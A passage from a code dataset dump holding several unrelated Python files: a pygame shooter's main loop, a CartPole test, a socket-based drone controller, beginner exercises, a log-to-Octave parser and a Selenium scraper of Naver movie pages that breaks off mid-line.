pygame.sprite.collide_circle)\n for hit in hits:\n dam.play()\n hit.health -= 1\n expl = Explosion(hit.rect.center, 'sm')\n allSprites.add(expl)\n if hit.health == 0:\n hit.kill()\n boom.play()\n score += 250\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n \n hits = pygame.sprite.groupcollide(boss, bullets, False, True, pygame.sprite.collide_circle)\n for hit in hits:\n dam.play()\n score += 125\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n hit.health -= 1\n hit.damaged = True\n if hit.health == 0:\n pygame.time.set_timer(fighter_wave, 0)\n for enemy in fighter:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n for bul in eBullets:\n expl = Explosion(bul.rect.center, 'lg')\n allSprites.add(expl)\n bul.kill()\n for meteor in mobs:\n expl = Explosion(bul.rect.center, 'lg')\n allSprites.add(expl)\n meteor.kill()\n hit.kill()\n boom.play()\n score += 5000\n expl = Explosion(hit.rect.center, 'nuke')\n allSprites.add(expl)\n boss_killed = True\n pygame.mixer.music.load(os.path.join(sndFolder, \"victory.mp3\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n\n # Check for collisions\n hits = pygame.sprite.spritecollide(player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= (hit.radius * 2) * 1.25\n random.choice(explosionSnds).play()\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n new_mob(Asteroid,mobs)\n if player.shield <= 0:\n boom.play()\n deathExpl = Explosion(player.rect.center, 'nuke')\n allSprites.add(deathExpl)\n player.hide()\n player.lives -= 1\n player.shield = 100 \n\n hits = pygame.sprite.spritecollide(player, fighter, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= 100\n random.choice(explosionSnds).play()\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n new_mob(EnemyFighter,fighter)\n if player.shield <= 0:\n boom.play()\n deathExpl = Explosion(player.rect.center, 'nuke')\n allSprites.add(deathExpl)\n player.hide()\n player.lives -= 1\n player.shield = 100 \n\n hits = pygame.sprite.spritecollide(player, eBullets, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= 15\n dam.play()\n expl = Explosion(hit.rect.center, 'sm')\n allSprites.add(expl)\n if player.shield <= 0:\n boom.play()\n deathExpl = Explosion(player.rect.center, 'nuke')\n allSprites.add(deathExpl)\n player.hide()\n player.lives -= 1\n player.shield = 100 \n\n hits = pygame.sprite.spritecollide(player, powerUps, True)\n for hit in hits:\n if hit.type == \"shield\":\n shieldPower.play()\n player.shield += 20\n score += 500\n if player.shield >= 100:\n player.shield = 100\n if hit.type == \"gun\":\n laserPower.play()\n score += 500\n player.powerup() \n\n # Waits for death animation to finish\n if player.lives == 0 and not deathExpl.alive():\n pygame.mixer.music.stop()\n game_over = True\n\n # Draw / render\n y1 += 1\n y += 1\n\n screen.fill(BLACK)\n screen.blit(background, (x,y))\n screen.blit(background, (x1,y1))\n if y > HEIGHT:\n y = -HEIGHT\n if y1 > HEIGHT:\n y1 = -HEIGHT\n allSprites.draw(screen)\n eBullets.draw(screen)\n draw_text(screen, str(score), 18, WIDTH / 2, 10)\n draw_shield_bar(screen, 5, 5, player.shield)\n draw_lives(screen, WIDTH - 100, 5, player.lives, playerMiniImg)\n\n # Display images\n if boss_killed == True:\n draw_text(screen, \"YOU WON!!!\", 64, WIDTH / 2, HEIGHT / 4)\n draw_text(screen, \"Final Score: \" + str(score), 22, WIDTH / 2, HEIGHT / 2)\n draw_text(screen, \"Press ESC to quit...\", 22, WIDTH / 2, HEIGHT * 0.75)\n pygame.display.flip()\n\npygame.quit()\n","repo_name":"martinMomo/starfighter","sub_path":"starfighter.py","file_name":"starfighter.py","file_ext":"py","file_size_in_byte":40451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20333283110","text":"from model import *\nimport gym \nfrom mxnet import nd, gluon\nimport mxnet as mx\nimport numpy as np\n\n\n\n'''\nenv = gym.make('CartPole-v0')\n\n# Simple state / action space\naction_dim = env.action_space.n\nobservation_dim = env.observation_space.shape[0]\n\n# Network definition\nnet = ActorCritic(observation_dim, action_dim)\nnet.collect_params().initialize()\n\ntest_input = nd.uniform(shape=(1, observation_dim))\ntest_out = net(test_input)\n\nprint(\"Success forward\")\n'''\n\n\nenv = gym.make('CartPole-v0')\nob = env.reset()\n\nprint('Action space', env.action_space)\nprint('Observation space', env.observation_space)\n\n\ndef run_episode(env, parameters): \n observation = env.reset()\n totalreward = 0\n for _ in range(200):\n action = 0 if np.matmul(parameters,observation) < 0 else 1\n observation, reward, done, info = env.step(action)\n env.render()\n totalreward += reward\n if done:\n print('Episode ended | Reward is', totalreward)\n break\n return totalreward\n\n\nbestparams = None \nbestreward = 0 \nfor _ in range(10000): \n parameters = np.random.rand(4) * 2 - 1\n reward = run_episode(env,parameters)\n if reward > bestreward:\n bestreward = reward\n bestparams = parameters\n # considered solved if the agent lasts 200 timesteps\n if reward == 200:\n break","repo_name":"dai-dao/PPO-Gluon","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"35434547679","text":"import socket\nimport threading\nfrom drone_class import DroneControl\nimport string\n\n# Use lock.acquire() when you are entering a part of the code that makes modifications to a shared object to\n# ensure that no other threads modify that object during this time.\n# Don't forget to use lock.release() [!] when you are done modifying the object, or the program will get stuck here.\nlock = threading.Lock()\nIP_ADDRESS = \"192.168.11.115\"\nPORT = 5005\nclient_conn = None\n# Use threading.Events to interrupt other threads/check if a condition is still true before moving on.\n# http://zulko.github.io/blog/2013/09/19/a-basic-example-of-threads-synchronization-in-python/\n# Basically, create an event for things that might happen such a \"new command event\"\n# Clear the event when it is not true, set the event when it becomes true, and check if the event is set or not\n# before doing something that is dependent on the event happening.\n\n\ndef connect_to_app():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((IP_ADDRESS, PORT))\n print('[STATUS] Drone is bound to ' + IP_ADDRESS + \", \" + str(PORT) + \" and waiting for app connection.\")\n sock.listen(1)\n conn, addr = sock.accept()\n print(\"Successfully connected to \" + str(addr))\n return conn\n\n\ndef connect_to_drone():\n print('[STATUS] Pi is Connecting to Pixracer')\n drone = DroneControl()\n print('Successfully connected to Pixracer')\n return drone\n\n\nclass AndroidAppDriver:\n def __init__(self, drone, app_stream):\n self.drone = drone\n self.app_stream = app_stream\n\n #Waypoint commands are commented out because compass on drone is damaged, will cause drone to crash\n def listen_for_user_input(self):\n def listen_thread():\n while True:\n try:\n incoming_command = android_app_stream.recv(1024)\n words = string.split(incoming_command,\",\")\n print(\"[STATUS] Processing string: \" + incoming_command)\n if \"quit\" in incoming_command:\n print(\"Quit Command Read\")\n if \"move\" in incoming_command:\n print(\"Move command Read\")\n self.drone.move_drone_nogps(float(words[3]), float(words[1]), float(words[2]), float(words[4]), 0, 1, 0)\n if \"takeoff\" in incoming_command:\n print(\"Takeoff command read\")\n #drone.arm_and_takeoff(float(words[1]))\n if \"waypoint\" in incoming_command:\n print(\"Waypoint command read\")\n #drone.waypoint_navigation(float(words[1]), float(words[2]), float(words[3]),0.5)\n if \"land\" in incoming_command:\n print(\"Land command read\")\n #drone.land()\n if \"stop\" in incoming_command:\n drone.emergency_stop()\n if \"arm\" in incoming_command:\n drone.arm_drone(int(words[1]))\n if \"status\" in incoming_command:\n print(\"Status command read\")\n self.app_stream.sendall(drone.status())\n except:\n print(\"Error in input command\")\n\n curr_thread = threading.Thread(target=listen_thread, args=())\n curr_thread.start()\n\n\nif __name__ == '__main__':\n drone = connect_to_drone()\n android_app_stream = connect_to_app()\n\n\n driver = AndroidAppDriver(drone, android_app_stream)\n\n driver.listen_for_user_input()\n\n","repo_name":"adityawadaskar/android-app-drone-control","sub_path":"Drone Code/android_app_driver.py","file_name":"android_app_driver.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34806570028","text":"# reversing a number\r\nnum = int(input(\"Enter a number:\"))\r\ntemp = num\r\nreverse = 0\r\nwhile num > 0:\r\n remainder = num % 10\r\n reverse = (reverse * 10) + remainder\r\n num = num // 10\r\n\r\nprint(f\"The given number is {temp} and reverse is {reverse}\")\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# GCD of a number\r\ndef gcd(a, b):\r\n while b:\r\n a, b = b, a % b\r\n return a\r\n\r\n# Example usage:\r\nprint(gcd(8, 12)) # Outputs: 4\r\n\r\n# ---------------------------------------------------------------\r\n\r\n#LCM of a number\r\ndef lcm(a, b):\r\n return abs(a*b) // gcd(a, b)\r\n\r\n# Example usage:\r\nprint(lcm(12, 15))\r\n\r\n# ---------------------------------------------------------------\r\n\r\n#Calculating factorial\r\ndef factorial(n):\r\n result = 1\r\n for i in range(1, n+1):\r\n result *= i\r\n return result\r\n\r\n# Example usage:\r\nprint(factorial(5)) # Outputs: 120\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Combinations\r\ndef combination(n,r):\r\n return factorial(n)/(factorial(r) * factorial (n-r))\r\n\r\n# Example usage:\r\nprint(combination(5,2))\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# function which return reverse of a string\r\ndef isPalindrome(s):\r\n return s == s[::-1]\r\n\r\ns = \"malayalam\"\r\nans = isPalindrome(s)\r\nif ans:\r\n print(\"Yes\")\r\nelse:\r\n print(\"No\")\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Fibonacci Series\r\n\r\nnum = int(input(\"Enter the number:\"))\r\nn1, n2 = 0, 1\r\nprint(\"Fibonacci series: \", n1, n2, end =\" \")\r\nfor i in range(2, num):\r\n n3 = n1 + n2\r\n n1 = n2\r\n n2 = n3\r\n print(n3, end = \" \")\r\n\r\nprint()\r\n\r\n# ---------------------------------------------------------------\r\n\r\n#Perfect number\r\n\r\nn = int(input(\"Enter any number: \"))\r\nsump= 0\r\nfor i in range(1, n):\r\n if(n % i == 0):\r\n sump= sump + i\r\n\r\nif (sump == n):\r\n print(\"The number is a Perfect number\")\r\nelse:\r\n print(\"The number is not a Perfect number\")\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# To find Leap year\r\n\r\nyear = int(input(\"Enter Year:\"))\r\nif (year % 400 == 0) or (year % 4 == 0 and year % 100 != 0):\r\n print(\"Leap year\")\r\nelse:\r\n print(\"Not a Leap year\")\r\n\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# reversing a string\r\n\r\nstr1 = \"Analytics Vidhya\" \r\nstr2 = \"\" \r\nfor i in str1: \r\n str2 = i + str2\r\n\r\nprint(\"The original string is: \",str1) \r\nprint(\"The reversed string is: \",str2)\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Finding missing elements in List\r\n\r\ntest_list = [3, 5, 6, 8, 10]\r\n \r\n# using list comprehension\r\n# Finding missing elements in List\r\nres = [ele for ele in range(max(test_list)+1) if ele not in test_list]\r\n\r\nprint('The list of missing elements : ' + str(res))\r\n\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Concatenate two lists\r\n\r\nlst1= ['W', 'a', 'w','b']\r\nlst2 = ['e', ' ','riting','log'] \r\nlst3 = [x + y for x, y in zip(lst1, lst2)] \r\nprint(lst3)\r\n\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# square of every element in a list\r\nlst = [1, 2, 3, 4]\r\n\r\nresult = [x**2 for x in lst]\r\nprint(result)\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Checking for Prime number\r\n\r\nnum = 11\r\n# If given number is greater than 1\r\nif num > 1:\r\n # Iterate from 2 to n / 2\r\n for i in range(2, int(num/2)+1):\r\n # If num is divisible by any number between\r\n # 2 and n / 2, it is not prime\r\n if (num % i) == 0:\r\n print(num, \"is not a prime number\")\r\n break\r\n else:\r\n print(num, \"is a prime number\")\r\nelse:\r\n print(num, \"is not a prime number\")\r\n\r\n# Another method using sqrt\r\n\r\nfrom math import sqrt\r\ndef prime_or_not(n):\r\n for i in range(2, int(sqrt(n))+1):\r\n if n % i == 0:\r\n return \"Not a prime number\"\r\n return \"Prime number\"\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Calculating factorial using recursion\r\n\r\ndef factorial(n):\r\n if n == 1:\r\n return n\r\n else:\r\n return n * factorial(n-1)\r\nfactorial(5)\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# How do you find the minimum value in a list with a lambda function?\r\n\r\nfrom functools import reduce\r\n\r\nb = [3, 1, 4, 1, 5, 9, 2, 6]\r\nminimum_value = reduce(lambda x, y: x if x < y else y, b)\r\nprint(minimum_value) # Outputs: 1\r\n\r\n\r\n# Write a code to get the minimum value in a dictionary.\r\ndict_ = {\r\n 'a': 10,\r\n 'b': 5,\r\n 'c': 15,\r\n 'd': 2\r\n}\r\n\r\nmin_value = min(dict_.values()) # Outputs 2\r\n\r\n# If you want the key associated with the min value:\r\n\r\nkey_with_min_value = dict_[min(dict_.keys(), key=(lambda k: dict_[k]))]\r\nprint(key_with_min_value) # Outputs: 'd'\r\n","repo_name":"Ajeeth12/Python","sub_path":"Python_questions.py","file_name":"Python_questions.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42566114346","text":"pageLog = open(\"pages.log\", \"r\")\nparsedPageLog = open(\"octavePagesBusiness.m\", \"w\", encoding=\"utf-8\")\n\npagesStatus = [0 for i in range(20)]\ntimeOctave = [0]\n\npagesRead = []\npagesWrite = []\npagesFree = [i for i in range(20)]\n\npagesReadOctave = [0]\npagesWriteOctave = [0]\npagesFreeOctave = [20]\n\nminTime = -1\n\nfor line in pageLog:\n\ttime, page, status = int(line[:line.find(\" \")]), int(line[line.find(\"|\")+1:line.find(\":\")]), line[line.find(\":\")+2:]\n\tif(minTime == -1):\n\t\tminTime = time-10\n\ttime = time - minTime\n\t#parsedPageLog.write(f\"Time: {time}, page: {page}, status: {status}\")\n\tif(\"writing in\" in status):\n\t\tif page in pagesRead:\n\t\t\tpagesRead.remove(page)\n\t\telif page in pagesFree:\n\t\t\tpagesFree.remove(page)\n\t\tpagesWrite.append(page)\n\telif(\"is being read\" in status):\n\t\tif page in pagesWrite:\n\t\t\tpagesWrite.remove(page)\n\t\telif page in pagesFree:\n\t\t\tpagesFree.remove(page)\n\t\tpagesRead.append(page)\n\telse:\n\t\tif page in pagesWrite:\n\t\t\tpagesWrite.remove(page)\n\t\telif page in pagesRead:\n\t\t\tpagesRead.remove(page)\n\t\tif page not in pagesFree:\n\t\t\tpagesFree.append(page)\n\t\n\ttimeOctave.append(time)\n\tpagesReadOctave.append(len(pagesRead))\n\tpagesWriteOctave.append(len(pagesWrite))\n\tpagesFreeOctave.append(len(pagesFree))\n\nparsedPageLog.write(f\"time = {timeOctave};\\nread = {pagesReadOctave};\\nwrite = {pagesWriteOctave};\\nfree = {pagesFreeOctave};\\n\")\nparsedPageLog.write(\"figure;\\nhold on;\\nplot(time, read, \\\"r\\\");\\nplot(time, write, \\\"b\\\");\\nplot(time, free, \\\"g\\\");\\nxlabel(\\\"Время, мс\\\")\\nhold off;\")\npageLog.close()\nparsedPageLog.close()","repo_name":"Leha009/OS","sub_path":"4/1/_PagesStates.py","file_name":"_PagesStates.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14542735378","text":"from selenium import webdriver\nimport constants as const\nimport re\nimport numpy as np\nimport time\nimport tqdm\nfrom sql_functions import SQL\n\nclass Naver_scrapping(webdriver.Chrome):\n def __init__(self, driver_path = \"/Users/hyojin/chromedriver\", teardown=False):\n self.teardown = teardown\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n # options.add_argument('--no-sandbox')\n # options.add_argument('--disable-dev-shm-usage')\n # options.add_argument('start-maximized')\n super(Naver_scrapping, self).__init__(options=options, executable_path=driver_path)\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #영화 연도 선택 페이지 이동 & 원하는 링크로 이동\n def land_page(self, link=const.MOVIE_DIRECORY_URL):\n self.get(link)\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n if link==const.MOVIE_DIRECORY_URL:\n self.find_element_by_xpath('/html/body/div/div[4]/div/div/div/div/div[1]/div[1]/ul/li[3]/a/img').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #해당 연도 영화 목록으로 이동\n def land_directory_of_year(self, year):#/html/body/div/div[4]/div/div/div/div/div[1]/table/tbody/tr[2]/td[1]/a\n if year>=2020:\n top = 2024\n line = 1\n elif year>=2016:\n top=2020\n line = 2\n elif year>=2012:\n top=2016\n line = 3\n self.find_element_by_class_name('directory_item_other').find_element_by_css_selector('#old_content > table > tbody > tr:nth-child('+str(line)+') > td:nth-child('+str(top-year)+') > a').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #영화 목록에서 다음 페이지로 이동\n def land_next_page(self):\n self.find_element_by_class_name(\"pagenavigation\").find_element_by_css_selector(\"#old_content > div.pagenavigation > table > tbody > tr > td.next\").click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #다음 페이지로 이동\n def land_next_page_review(self):\n self.find_element_by_xpath('//*[@id=\"pagerTagAnchor2\"]/em').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #해당 연도의 각 영화 URL 수집 함수\n def get_movies_in_the_page(self):\n movie_urls = []\n while True:\n for i in range(20):\n try:\n movie_urls.append(self.find_element_by_css_selector('#old_content > ul > li:nth-child('+str(i+1)+') > a').get_attribute('href'))\n except:\n break\n try:\n self.land_next_page()\n except:\n break\n return movie_urls\n #각 테이블에 삽입할 데이터 수집\n def get_movie_information(self, year):\n infos = []\n self.land_directory_of_year(year)\n movie_urls = self.get_movies_in_the_page()\n for i, url in enumerate(movie_urls):\n self.land_page(url)\n movie, jenre, image, video, director, casting, country, review = self.get_movie_info(i)\n infos.append([movie, jenre, image, video, director, casting, country, review])\n return infos\n #Movie 테이블 정보 수집\n def get_movie_table_info(self, movie_code, year):\n movie = [movie_code]\n try:\n movie.append(self.find_element_by_css_selector(\"#content > div.article > div.mv_info_area > div.mv_info > h3 > a\").text)\n except:\n movie.append(None)\n #original title\n try:\n movie.append(self.find_element_by_css_selector(\"#content > div.article > div.mv_info_area > div.mv_info > strong\").get_attribute(\"title\"))\n except:\n movie.append(None)\n #opening_date\n try:\n opening_date = self.find_element_by_class_name(\"step1\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[1]/p').text.split(\" \")[-3:-1]\n o_date = opening_date[0] + opening_date[1]\n if o_date.count('.')==2:\n movie.append(o_date.replace(\".\", \"-\"))\n elif o_date.count('.')==1:\n movie.append(o_date.replace(\".\", \"-\")+\"-01\")\n else:\n movie.append(str(year)+\"-01-01\")\n except:\n movie.append(None)\n #playing_time\n try:#\n movie.append(int((self.find_element_by_class_name(\"step1\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[1]/p/span[3]').text).replace(\"분\", \"\")))\n except:\n movie.append(None)\n #domestic_rate\n try:#\n movie.append(self.find_element_by_class_name(\"step4\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[4]/p/a').text)\n except:\n movie.append(None)\n #foreign_rate\n try:#\n movie.append(self.find_element_by_class_name(\"step4\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[4]/p/a[2]').text)\n except:\n movie.append(None)\n #cumulative_audience\n try:\n movie.append(int(self.find_element_by_class_name(\"step9\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[5]/div/p').text.split('(')[0].replace(\"명\", \"\").replace(\",\", \"\")))\n except:\n movie.append(None)\n #subtitle\n try:\n string = \"\"\n for txt in self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(1) > div > div > h5\"):\n string = string + txt.text\n if string==\"\":\n movie.append(None)\n else:\n movie.append(string.replace(\"\\n\",\" \"))\n except:\n movie.append(None)\n #content\n try:\n string = \"\"\n for txt in self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(1) > div > div > p\"):\n string = string + txt.text\n if string==\"\":\n movie.append(None)\n else:\n movie.append(string.replace(\"\\n\", \" \"))\n except:\n movie.append(None)\n #poster_url\n try:\n movie.append(self.find_element_by_css_selector(\"#content > div.article > div.mv_info_area > div.poster > a > img\").get_attribute(\"src\"))\n except:\n movie.append(None)\n #audience_rate\n try:\n movie.append(float(self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[1]').text \\\n + self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[2]').text \\\n + self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[3]').text \\\n + self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[4]').text))\n except:\n movie.append(None)\n #journalist_rate\n try:\n movie.append(float(self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[1]').text \\\n + self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[2]').text \\\n + self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[3]').text \\\n + self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[4]').text))\n except:\n movie.append(None)\n\n #netizen_rate\n try:\n movie.append(float(self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[1]').text \\\n + self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[2]').text \\\n + self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[3]').text \\\n + self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[4]').text))\n except:\n movie.append(None)\n #audience_count\n self.get(self.current_url.replace(\"basic\", \"point\"))\n try:\n movie.append(int(self.find_element_by_class_name(\"grade_audience\").find_element_by_css_selector(\"#actual_point_tab_inner > span > em\").text))\n except:\n movie.append(None)\n #journalist_count\n try:\n movie.append(int(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(6) > div > div.title_area > span > em\").text))\n except:\n movie.append(None)\n #netizen_count\n try:\n movie.append(int(self.find_element_by_class_name(\"grade_netizen\").find_element_by_css_selector(\"#graph_area > div.grade_netizen > div.title_area.grade_tit > div.sc_area > span > em\").text))\n except:\n movie.append(None)\n self.back()\n\n return movie\n #영화(배우, 감독) 코드 추출\n def get_movie_code(self, url):\n # url = self.current_url\n print(\"movie URL: \", url)\n c_url = int(re.sub(\"([a-z])\\w+[-=+,#/\\?:^$.@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>`\\'…》]|(\\/\\/)\", \"\", url))\n print(\"movie CODE: \", c_url)\n return c_url\n #리뷰 코드 추출\n def get_review_code(self):\n return int(re.sub(\"([a-z])\\w+[-=+,#/\\?:^$.@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>`\\'…》]|(\\/\\/)|#(\\w+)\", \"\", self.current_url.split(\"&\")[0].replace(\"#\", \"\")))\n #배우 테이블 정보 수집\n def get_actor_table_info(self, movie_code):\n # actor : [actor_name, original_actor_name, actor_code]\n # movie_actor : [movie_code, cast, role, actor_code]\n actor = []\n movie_actor = [] #intersection table\n\n try:\n self.get(self.current_url.replace(\"basic\", \"detail\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n try:\n self.find_element_by_css_selector(\"#actorMore\").click() #펼쳐보기\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n pass\n\n num_actor = len(self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li > div > a\"))\n for i in range(num_actor):\n actor_one = []\n movie_actor_one = [movie_code]\n\n atr = self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li > div > a\")[i]\n \n #actor_name - actor\n actor_one.append(atr.text)\n #actor_original_name\n try:\n actor_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li:nth-child(\"+str(i+1)+\") > div > em\").text)\n except:\n actor_one.append(None)\n #cast - movie_actor\n try:\n movie_actor_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li:nth-child(\"+str(i+1)+\") > div > div > p.in_prt > em\").text)\n except:\n movie_actor_one.append(None)\n #role - movie_actor\n try:\n movie_actor_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li:nth-child(\"+str(i+1)+\") > div > div > p.pe_cmt > span\").text)\n except:\n movie_actor_one.append(None)\n \n atr.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n # actor_code\n actor_one.append(self.get_movie_code(self.current_url))\n movie_actor_one.append(self.get_movie_code(self.current_url))\n\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n\n try:\n self.find_element_by_css_selector(\"#actorMore\").click() #펼쳐보기\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n pass\n\n actor.append(actor_one)\n movie_actor.append(movie_actor_one)\n \n self.get(self.current_url.replace(\"detail\", \"basic\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n return actor, movie_actor\n except:\n return None, None\n #감독 테이블 정보 수집\n def get_director_table_info(self, movie_code):\n # director : [director_name, original_director_name, director_code]\n # movie_actor : [movie_code, director_code]\n director = []\n movie_director = [] #intersection table\n\n try:\n self.get(self.current_url.replace(\"basic\", \"detail\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n \n num_director = len(self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div > div > a\"))\n if num_director == 1:\n director_one = []\n movie_director_one = [movie_code]\n #director name\n d_name = self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div.dir_obj > div > a\")\n director_one.append(d_name.text)\n #director original name\n try:\n director_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div.dir_obj > div > em\").text)\n except:\n director_one.append(None)\n\n d_name.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n director_one.append(self.get_movie_code(self.current_url))\n movie_director_one.append(self.get_movie_code(self.current_url))\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n \n director.append(director_one)\n movie_director.append(movie_director_one)\n else:\n for i in range(num_director):\n director_one = []\n movie_director_one = [movie_code]\n #director name\n d_name = self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div:nth-child(\"+str(i+2)+\") > div > a\")\n director_one.append(d_name.text)\n #director original name\n d_o_name = self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div:nth-child(\"+str(i+2)+\") > div > em\").text\n if d_o_name == '':\n director_one.append(None)\n else:\n director_one.append(d_o_name)\n d_name.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n director_one.append(self.get_movie_code(self.current_url))\n movie_director_one.append(self.get_movie_code(self.current_url))\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n\n director.append(director_one)\n movie_director.append(movie_director_one)\n return director, movie_director\n except:\n return None, None\n #리뷰 테이블 정보 수집\n def get_review_table_info(self, movie_code):\n review = []\n movie_review = [] #intersection table\n review2 = []\n\n try:\n self.get(self.current_url.replace(\"basic\", \"review\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n num_review = int(self.find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[4]/div/div/div/div/div[2]/span/em').text.replace(\",\",\"\"))\n \n # if num_review%10==0:\n # num_page = int(num_review/10)\n # else:\n # num_page = int(num_review/10) + 1\n num_page = int(np.ceil(num_review/10))\n \n # print(\"start\")\n for page in range(1, num_page+1):\n if page == 2:\n break\n self.find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[4]/div/div/div/div/div[3]/div/a['+str(page)+']/span').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n # print(page, \"페이지\")\n for i in range(10):\n # print(i, \"번째\")\n try:\n review_one = []\n movie_review_one = [movie_code]\n \n #id\n review_one.append(self.find_element_by_css_selector(\"#reviewTab > div > div > ul > li:nth-child(\"+str(i+1)+\") > span > a\").text)\n # print(\"--id\")\n #date\n try:\n review_one.append(self.find_element_by_css_selector(\"#reviewTab > div > div > ul > li:nth-child(\"+str(i+1)+\") > span > em:nth-child(2)\").text.replace(\".\", \"-\"))\n except:\n review_one.append(None)\n # print(\"--date\")\n\n self.find_element_by_css_selector(\"#reviewTab > div > div > ul > li:nth-child(\"+str(i+1)+\") > a > strong\").click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n time.sleep(1)\n\n r_code = self.get_review_code()\n # print(r_code, 